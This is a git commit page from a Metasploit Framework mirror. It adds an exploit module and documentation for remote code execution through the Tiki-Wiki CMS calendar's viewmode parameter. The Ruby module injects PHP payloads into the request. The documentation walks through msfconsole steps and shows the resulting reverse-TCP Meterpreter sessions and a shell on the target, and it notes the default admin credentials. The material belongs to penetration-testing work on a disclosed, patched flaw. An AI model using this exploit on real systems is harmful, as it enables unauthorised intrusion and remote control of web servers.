infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #6992, Add tiki calendar exec exploit

bug/bundler_fix
wchen-r7 2016-06-22 11:18:14 -05:00
parent f85e7972d1 8697d3d6fb
commit de5152401a
No known key found for this signature in database
GPG Key ID: 2384DB4EF06F730B
2 changed files with 254 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

103
documentation/modules/exploit/linux/http/tiki_calendar_exec.md Normal file
View File

@ -0,0 +1,103 @@
## Vulnerable Application
* Official Source: [sourceforge](https://sourceforge.net/projects/tikiwiki/files/Tiki_14.x_Peony/14.1/)
* Exploit-db: [edb](https://www.exploit-db.com/apps/2fa84367ba4f14afab9f51cd3e93606d-tiki-14.2.7z)
* Archived Copy: [github](https://github.com/h00die/MSF-Testing-Scripts)
**Of note, there is some discussion if 14.2 is vuln or not.**
1. Exploit-DB says in the title (may be wrong) 14.2 is vuln.
2. The linked app Exploit-DB has is 14.2.
3. Its verified on Exploit-DB.
vs
1. Manual print statement testing from the PoC on 14.2 doesn't seem to be vuln
2. The [notice](https://tiki.org/article414-Important-Security-Fix-for-all-versions-of-Tiki) seems to say 14.2 is the update that fixes the problem
### Creating A Testing Environment
1. Create a fresh Ubuntu 16.04 w/ a LAMP install
2. `apt-get install php-xml`
3. Normal php install at that point!
4. After install, login as admin:admin
5. Go to the Control Panels
6. Click Features
7. Enable Calendar under Main feature
8. Click Apply
#### Permissions
If you wish to enable the non-logged in user (anonymous) to view/exploit the calendar:
1. Log in as admin
2. From the top dropdown select permissions
3. Check Anonymous near the top
4. Click Assign
## Verification Steps
1. Install the software as documented above
2. Start msfconsole
3. Do: `use exploit/linux/http/tiki_calendar_exec`
4. Do: `set rhost 10.10.10.10`
5. (optional, if not set, set username to empty) Do: `set PASSWORD admin`
6. Do: `set payload php/bind_perl`
7. Do: `set verbose true`
8. Do: `check`
```
[*] Attempting Login
[+] Login Successful!
[+] 10.10.10.10:80 The target is vulnerable.
```
9. Do: `exploit`
10. You should get a shell
```
[*] Started reverse TCP handler on 10.10.10.10:4444
[*] Attempting Login
[+] Login Successful!
[*] Sending malicious calendar view packet
[*] Sending stage (33721 bytes) 10.10.10.10.190
[*] Meterpreter session 1 opened (10.10.10.10:4444 -> 192.168.2.190:48188) at 2016-06-19 08:50:44 -0400
```
## Options
**PASSWORD**
Password is set at first login. Default for admin is 'admin'.
## Scenarios
Example running against unauthenticated calendar v14.1
```
msf > use exploit/linux/http/tiki_calendar_exec
msf exploit(tiki_calendar_exec) > set rhost 192.168.2.190
rhost => 192.168.2.190
msf exploit(tiki_calendar_exec) > set targeturi /t14_1/
targeturi => /t14_1/
msf exploit(tiki_calendar_exec) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(tiki_calendar_exec) > set lhost 192.168.2.229
lhost => 192.168.2.229
msf exploit(tiki_calendar_exec) > set verbose true
verbose => true
msf exploit(tiki_calendar_exec) > set username ''
username =>
msf exploit(tiki_calendar_exec) > exploit
[*] Started reverse TCP handler on 192.168.2.229:4444
[*] Sending malicious calendar view packet
[*] Sending stage (33721 bytes) to 192.168.2.190
[*] Meterpreter session 1 opened (192.168.2.229:4444 -> 192.168.2.190:48172) at 2016-06-18 10:58:19 -0400
meterpreter > sysinfo
Computer : tikiwiki
OS : Linux tikiwiki 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64
Meterpreter : php/php
meterpreter >
```

151
modules/exploits/linux/http/tiki_calendar_exec.rb Normal file
View File

@ -0,0 +1,151 @@
##
## This module requires Metasploit: http://metasploit.com/download
## Current source: https://github.com/rapid7/metasploit-framework
###
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Tiki-Wiki CMS Calendar Command Execution',
'Description' => %q(
Tiki-Wiki CMS's calendar module contains a remote code execution
vulnerability within the viewmode GET parameter.
The calendar module is NOT enabled by default. If enabled,
the default permissions are set to NOT allow anonymous users
to access.
Vulnerable versions: <=14.1, <=12.4 LTS, <=9.10 LTS and <=6.14
Verified/Tested against 14.1
),
'Author' =>
[
'h00die <mike@shorebreaksecurity.com>', # module
'Dany Ouellet' # discovery
],
'References' =>
[
[ 'EDB', '39965' ],
[ 'URL', 'https://tiki.org/article414-Important-Security-Fix-for-all-versions-of-Tiki']
],
'License' => MSF_LICENSE,
'Platform' => %w( php ),
'Privileged' => false,
'Arch' => ARCH_PHP,
'Targets' =>
[
[ 'Automatic Target', {}]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jun 06 2016'
)
)
register_options(
[
Opt::RPORT(80),
OptString.new('TARGETURI', [ true, 'The URI of Tiki-Wiki', '/']),
OptString.new('USERNAME', [ false, 'Username of a user with calendar access', 'admin']),
OptString.new('PASSWORD', [ false, 'Password of a user with calendar access', 'admin'])
], self.class
)
end
# returns cookie regardless of outcome
def authenticate
begin
# get a cookie to start with
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'tiki-login_scr.php'),
'method' => 'GET'
)
cookie = res ? res.get_cookies : ''
# if we have creds, login with them
vprint_status('Attempting Login')
# the bang on the cgi will follow the redirect we receive on a good login
res = send_request_cgi!(
'uri' => normalize_uri(target_uri.path, 'tiki-login.php'),
'method' => 'POST',
'ctype' => 'application/x-www-form-urlencoded',
'cookie' => cookie,
'vars_post' =>
{
'user' => datastore['USERNAME'],
'pass' => datastore['PASSWORD'],
'login' => '',
'stay_in_ssl_mode_present' => 'y',
'stay_in_ssl_mode' => 'n'
}
)
# double check auth worked and we got a Log out on the page.
# at times I got it to auth, but then it would give permission errors
# so we want to try to double check everything is good
if res && !res.body =~ /Log out/
fail_with(Failure::UnexpectedReply, "#{peer} Login Failed with #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
end
vprint_good("Login Successful!")
return cookie
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
end
end
# sends the calendar packet, returns the HTTP response
def send_calendar_packet(cookie, data)
begin
return send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'tiki-calendar.php'),
'method' => 'GET',
'cookie' => cookie,
'vars_get' =>
{
'viewmode' => "';#{data};$a='"
}
)
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
end
end
# Version numbers are post auth, so we send a print statement w/
# 10 random characters and check for it in the response
def check
if datastore['USERNAME'] && !datastore['USERNAME'].blank?
cookie = authenticate
end
flag = Rex::Text.rand_text_alpha(10)
res = send_calendar_packet(cookie, "print(#{flag})")
if res
if res.body =~ /You do not have permission to view the calendar/i
fail_with(Failure::NoAccess, "#{peer} - Additional Permissions Required")
elsif res.body =~ />#{flag}</
Exploit::CheckCode::Vulnerable
else
Exploit::CheckCode::Safe
end
end
end
def exploit
if datastore['USERNAME'] && !datastore['USERNAME'].blank?
cookie = authenticate
end
vprint_status('Sending malicious calendar view packet')
res = send_calendar_packet(cookie, payload.encoded)
if res && res.body =~ /You do not have permission to view the calendar/i
fail_with(Failure::NoAccess, "#{peer} - Additional Permissions Required")
end
end
end